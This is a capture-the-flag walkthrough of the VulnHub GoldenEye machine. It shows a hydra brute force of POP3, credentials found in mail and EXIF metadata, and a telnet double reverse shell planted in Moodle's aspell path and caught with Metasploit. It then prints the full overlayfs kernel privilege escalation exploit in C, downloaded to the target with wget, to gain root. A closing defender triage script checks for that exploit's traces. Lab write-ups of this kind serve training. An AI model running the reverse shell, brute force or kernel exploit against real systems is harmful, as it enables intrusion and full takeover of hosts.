    root@kali:~/vulnhub/goldeneyev1# hydra -l doak -P /usr/share/wordlists/fasttrack.txt 10.0.133.48 -s 55007 pop3
    Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:53:56
    [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
    [DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
    [DATA] attacking pop3://10.0.133.48:55007/
    [STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
    [STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
    [55007][pop3] host: 10.0.133.48   login: doak   password: goat
    1 of 1 target successfully completed, 1 valid password found
    Hydra (http://www.thc.org/thc-hydra) finished at 2018-08-07 18:56:16
    
Username: doak, password: goat

Reading Doak's email
--------------------

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# telnet 10.0.133.48 55007
    Trying 10.0.133.48...
    Connected to 10.0.133.48.
    Escape character is '^]'.
    +OK GoldenEye POP3 Electronic-Mail System
    USER doak
    +OK
    PASS goat
    +OK Logged in.
    LIST
    +OK 1 messages:
    1 606
    .
    RETR 1
    +OK 606 octets
    Return-Path: 
    X-Original-To: doak
    Delivered-To: doak@ubuntu
    Received: from doak (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 97DC24549D
        for ; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
    Message-Id: <20180425034731.97DC24549D@ubuntu>
    Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
    From: doak@ubuntu

    James,
    If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

    Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

    username: dr_doak
    password: 4England!

    .
    QUIT
    +OK Logging out.
    Connection closed by foreign host.
    
Dr Doak's Moodle credentials are discovered.

Exploring Dr. Doak's Moodle account
-----------------------------------

A file named ``s3cret.txt`` is discovered in his Moodle file storage:

.. image:: ./images/goldeneye/GoldenEye_moodle_doak_file.png
   :alt: goldeneye moodle doaks file

The file contains:

.. code-block:: text

   007,

   I was able to capture this apps adm1n cr3ds through clear txt.

   Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

   Something juicy is located here: /dir007key/for-007.jpg

   Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

The message points to an image at http://severnaya-station.com/dir007key/for-007.jpg; perhaps the admin credentials are hidden in it. Download the file and read its EXIF metadata with ``exif``:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# exif for-007.jpg 
    EXIF tags in 'for-007.jpg' ('Motorola' byte order):
    --------------------+----------------------------------------------------------
    Tag                 |Value
    --------------------+----------------------------------------------------------
    Image Description   |eFdpbnRlcjE5OTV4IQ==
    Manufacturer        |GoldenEye
    Resolution Unit     |Inch
    Software            |linux
    Artist              |For James
    YCbCr Positioning   |Centred
    X-Resolution        |72
    Y-Resolution        |72
    Exif Version        |Unknown Exif Version
    Components Configura|Y Cb Cr -
    User Comment        |For 007
    FlashPixVersion     |FlashPix Version 1.0
    Colour Space        |Internal error (unknown value 65535)
    --------------------+----------------------------------------------------------
    
The Image Description field looks suspiciously like a base64 encoded string; decode it:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# echo -n "eFdpbnRlcjE5OTV4IQ==" | base64 -d
    xWinter1995x!
    
Logging into the admin user's Moodle account
--------------------------------------------

The admin user has far greater privileges on the Moodle installation, and after some exploration a feature was found that may allow remote code execution (RCE) on the server: the path to the ``aspell`` binary used by the spell checker is configurable from the admin UI, and on this machine it has already been replaced with a command.

.. image:: ./images/goldeneye/GoldenEye_aspell_path.png
   :alt: goldeneye moodle aspell path

The path is set to:

.. code-block:: text

   sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'

Breaking this command down, it is a reverse shell; specifically Metasploit's "Unix Command Shell, Double Reverse TCP (telnet)" payload (``cmd/unix/reverse``):

* ``sh -c`` executes the command string that follows
* the parentheses run the whole pipeline in a subshell, and the trailing ``&`` backgrounds it so the spell-check request returns
* ``sleep 4062`` is piped into the first ``telnet``'s stdin purely to keep that stdin open for the life of the session; without it telnet would read EOF and exit (Metasploit generates the value as 3600 plus a random offset, so keep it long)
* whatever arrives on the first telnet connection, i.e. the attacker's commands, is piped into ``while : ; do sh && break; done``, which keeps restarting ``sh`` until it exits cleanly, with stderr merged into stdout (``2>&1``)
* the shell's output is piped into the stdin of a second ``telnet`` connection to the same port, whose own output is discarded (``>/dev/null 2>&1``)

The result is a shell whose input travels over one TCP connection and whose output travels back over the other; the listener has to accept both and work out which is which.

@TODO investigate further how this works

@TODO why does a simple reverse shell using bash not work?

Low Privilege shell
===================

Modify the aspell path, changing the IP address in both telnet commands to that of our Kali box:

.. code-block:: shell

   sh -c '(sleep 10|telnet 10.0.133.20 4444|while : ; do sh && break; done 2>&1|telnet 10.0.133.20 4444 >/dev/null 2>&1 &)'

.. image:: ./images/goldeneye/GoldenEye_aspell_path2.png
   :alt: goldeneye moodle aspell path

The spell checker used by the TinyMCE editor must also be set to "PSpellShell":

.. image:: ./images/goldeneye/GoldenEye_set_aspell.png
   :alt: goldeneye moodle aspell path

A single ``netcat`` listener cannot receive this shell because it arrives as two separate telnet connections, so Metasploit's multi/handler with the matching payload is used instead:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# msfconsole -q
    msf > use exploit/multi/handler 
    msf exploit(multi/handler) > set payload cmd/unix/reverse
    payload => cmd/unix/reverse
    msf exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf exploit(multi/handler) > set LHOST 10.0.133.20
    LHOST => 10.0.133.20
    msf exploit(multi/handler) > run 

    
Trigger the reverse shell by editing a page with TinyMCE and running a spellcheck:

.. image:: ./images/goldeneye/GoldenEye_spell_check.png
    :alt: goldeneye spell check

The reverse shell connects back:

.. raw:: html

    [*] Started reverse TCP double handler on 10.0.133.20:4444 
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo hkIz4NyjVhH7lGXN;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket A
    [*] A: "hkIz4NyjVhH7lGXN\r\n"
    [*] Matching...
    [*] B is input...
    [*] Command shell session 1 opened (10.0.133.20:4444 -> 10.0.133.48:36916) at 2018-08-08 14:22:18 +0100

    id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
Privilege escalation
====================

Python was used to spawn an interactive shell from the initial telnet double reverse shell:

.. raw:: html

    python -c 'import pty; pty.spawn("/bin/sh");'
    
An interesting directory is discovered in the Apache default vhost's webroot: `/var/www/html/006-final/xvf7-flag/`. Navigating to http://10.0.133.48/006-final/xvf7-flag/ displays the "Flag captured" page even though we do not yet have root.

.. image:: ./images/goldeneye/GoldenEye_flag.png
    :alt: goldeneye flag

After further enumeration from the low privilege shell there does not appear to be a way to escalate to root privileges without resorting to kernel exploits.

.. raw:: html

    $ uname -a
    uname -a
    Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
    $ cat /etc/lsb-release
    cat /etc/lsb-release
    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=14.04
    DISTRIB_CODENAME=trusty
    DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
    
`searchsploit` returns an exploit that should work with the Linux distribution and kernel version on the server:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# searchsploit ubuntu 14.04 3.13
    --------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Exploit Title                                                                                                                         |  Path
                                                                                                                                           | (/usr/share/exploitdb/)
    --------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
    Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                                   | exploits/linux/local/37292.c
    Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)              | exploits/linux/local/37293.txt
    --------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
    
Use a modified version of "Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation", URL: https://www.exploit-db.com/exploits/37292/

The exploit must be slightly modified so that the ``system()`` call that builds the helper shared library uses ``clang`` instead of ``gcc``, as ``gcc`` is not available on the target (recall the text "For programming I highly prefer the Alternative to GCC, which FreeBSD uses..." found in the splashAdmin.php page).

The vulnerability description: the overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace.

.. code-block:: c
    :linenos:

    /* Headers restored: the extracted copy had lost the header names.
       _GNU_SOURCE is needed for the clone() and unshare() prototypes. */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <string.h>
    #include <signal.h>
    #include <sched.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/mount.h>
    #include <sys/wait.h>

    /* Source of the helper library. Once listed in /etc/ld.so.preload it is
       loaded into every dynamically linked process; when the process is
       /bin/su running as root, the hooked getuid() cleans up the preload
       file and hands back a root shell. */
    #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

    static char child_stack[1024*1024];

    /* Runs inside a new user + mount namespace where overlayfs mounts are
       permitted. Two mounts are abused: the first to obtain a file that can
       be renamed to "ld.so.preload", the second with /etc as the upper
       directory so that the rename lands in the real /etc. */
    static int child_exec(void *stuff)
    {
        char *file;
        system("rm -rf /tmp/ns_sploit");
        mkdir("/tmp/ns_sploit", 0777);
        mkdir("/tmp/ns_sploit/work", 0777);
        mkdir("/tmp/ns_sploit/upper",0777);
        mkdir("/tmp/ns_sploit/o",0777);

        fprintf(stderr,"mount #1\n");
        if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
            // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
            if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
                fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
                exit(-1);
            }
            file = ".access";
            chmod("/tmp/ns_sploit/work/work",0777);
        } else file = "ns_last_pid";

        chdir("/tmp/ns_sploit/o");
        rename(file,"ld.so.preload");
        chdir("/");
        umount("/tmp/ns_sploit/o");
        fprintf(stderr,"mount #2\n");
        if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
            if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
                exit(-1);
            }
            chmod("/tmp/ns_sploit/work/work",0777);
        }
        chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
        umount("/tmp/ns_sploit/o");
        return 0;   /* added: the original fell off the end of a non-void function */
    }

    int main(int argc, char **argv)
    {
        int status, fd, lib;
        pid_t wrapper, init;
        int clone_flags = CLONE_NEWNS | SIGCHLD;

        fprintf(stderr,"spawning threads\n");

        if((wrapper = fork()) == 0) {
            /* unprivileged user namespace: the child becomes "root" inside it */
            if(unshare(CLONE_NEWUSER) != 0)
                fprintf(stderr, "failed to create new user namespace\n");

            if((init = fork()) == 0) {
                pid_t pid =
                    clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                if(pid < 0) {
                    fprintf(stderr, "failed to create new mount namespace\n");
                    exit(-1);
                }

                waitpid(pid, &status, 0);
            }

            waitpid(init, &status, 0);
            return 0;
        }

        usleep(300000);

        wait(NULL);

        fprintf(stderr,"child threads done\n");

        /* If the namespace trick worked, a world-writable /etc/ld.so.preload now exists. */
        fd = open("/etc/ld.so.preload",O_WRONLY);

        if(fd == -1) {
            fprintf(stderr,"exploit failed\n");
            exit(-1);
        }

        fprintf(stderr,"/etc/ld.so.preload created\n");

        fprintf(stderr,"creating shared library\n");

        lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);

        write(lib,LIB,strlen(LIB));

        close(lib);

        /* this is the gcc reference replaced with clang for GoldenEye */
        lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

        if(lib != 0) {
            fprintf(stderr,"couldn't create dynamic library\n");
            exit(-1);
        }

        write(fd,"/tmp/ofs-lib.so\n",16);

        close(fd);

        system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");

        /* su is setuid root, so the preloaded library's getuid() hook fires as root */
        execl("/bin/su","su",NULL);
    }

The C code is saved to the file `oly.c` and all references to `gcc` are replaced with `clang`:

@TODO step through and fully understand exploit

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# sed -i 's\gcc\clang\g' oly.c 
    
Serve the modified exploit code with Python's SimpleHTTPServer so that it can be downloaded on the target:

.. raw:: html

    root@kali:~/vulnhub/goldeneyev1# python -m SimpleHTTPServer 80
    Serving HTTP on 0.0.0.0 port 80 ...
    10.0.133.48 - - [08/Aug/2018 17:17:22] "GET /oly.c HTTP/1.1" 200 -
    
Download and compile the exploit on GoldenEye:

.. raw:: html

    $ wget http://10.0.133.20/oly.c
    wget http://10.0.133.20/oly.c
    --2018-08-08 09:17:22--  http://10.0.133.20/oly.c
    Connecting to 10.0.133.20:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3863 (3.8K) [text/plain]
    Saving to: 'oly.c'

    100%[======================================>] 3,863       --.-K/s   in 0s      

    2018-08-08 09:17:22 (723 MB/s) - 'oly.c' saved [3863/3863]
    $ clang oly.c -o oly
    clang oly.c -o oly
    oly.c:61:1: warning: control may reach end of non-void function [-Wreturn-type]
    }
    ^
    oly.c:73:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
            if(unshare(CLONE_NEWUSER) != 0)
               ^
    oly.c:78:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
                    clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
                    ^
    oly.c:84:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
                waitpid(pid, &status, 0);
                ^
    oly.c:94:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
        wait(NULL);
        ^
    5 warnings generated.
    $ ls
    ls
    oly  oly.c
    
Run the exploit and escalate to root:

.. raw:: html

    $ ./oly
    ./oly
    spawning threads
    mount #1
    mount #2
    child threads done
    /etc/ld.so.preload created
    creating shared library
    # id
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    
Discover the flag hidden in /root:

.. code-block:: text

    # cat /root/.flag.txt
    cat /root/.flag.txt
    Alec told me to place the codes here:
    568628e0d993b1973adc718237da6e93
    If you captured this make sure to go here.....
    /006-final/xvf7-flag/

Since the /006-final/xvf7-flag/ path was already discovered (see above) with the low privilege shell, there's no need to go back to it.
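From the defender's side, the escalation above leaves three things worth checking on a host: the kernel release, the contents of /etc/ld.so.preload (the exploit drops `/tmp/ofs-lib.so` there) and whether unprivileged user namespaces are enabled. The following triage helpers are an added example and not part of the original write-up or the exploit; the affected range is an assumption taken from the searchsploit title (3.13.0 <= kernel < 3.19), and the sysctl file is the Ubuntu/Debian `kernel.unprivileged_userns_clone` knob, which may be absent on other kernels.

```shell
#!/bin/sh
# Added example (not from the original write-up): defender-side triage helpers
# for the overlayfs local privilege escalation discussed above.
# Assumption: affected range 3.13.0 <= kernel < 3.19 (from the searchsploit title).

# Return 0 when a `uname -r` string falls in the affected range.
kernel_in_affected_range() {
    ver=${1%%-*}                       # "3.13.0-32-generic" -> "3.13.0"
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -lt 19 ]
}

# Return 0 when an ld.so.preload file lists a library outside the normal
# library directories. The exploit above writes /tmp/ofs-lib.so there, so an
# entry under /tmp, /dev/shm or a home directory is a strong indicator.
preload_file_suspicious() {
    [ -f "$1" ] || return 1
    while IFS= read -r lib || [ -n "$lib" ]; do
        case "$lib" in
            ''|'#'*) ;;                                  # blank line or comment
            /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;  # expected locations
            *) return 0 ;;
        esac
    done < "$1"
    return 1
}

# Print enabled/disabled/unknown for unprivileged user namespaces, which the
# exploit needs in order to mount overlayfs as www-data. Assumption: the file
# holds the Ubuntu/Debian sysctl value, 1 meaning enabled.
userns_state() {
    [ -f "$1" ] || { echo unknown; return; }
    [ "$(cat "$1")" = "1" ] && echo enabled || echo disabled
}

# Live triage of the current host; the helpers take explicit inputs so they
# can also be run against files collected from another machine.
triage() {
    k=$(uname -r)
    kernel_in_affected_range "$k" && echo "kernel $k: in affected range"
    preload_file_suspicious /etc/ld.so.preload && echo "/etc/ld.so.preload: unexpected entry"
    echo "unprivileged user namespaces: $(userns_state /proc/sys/kernel/unprivileged_userns_clone)"
}
```

A kernel in the affected range is only exploitable this way if the Ubuntu package is older than the 3.19.0-21.21 fix named in the description above, so the package version decides, and the preload check is what catches a host that has already been compromised.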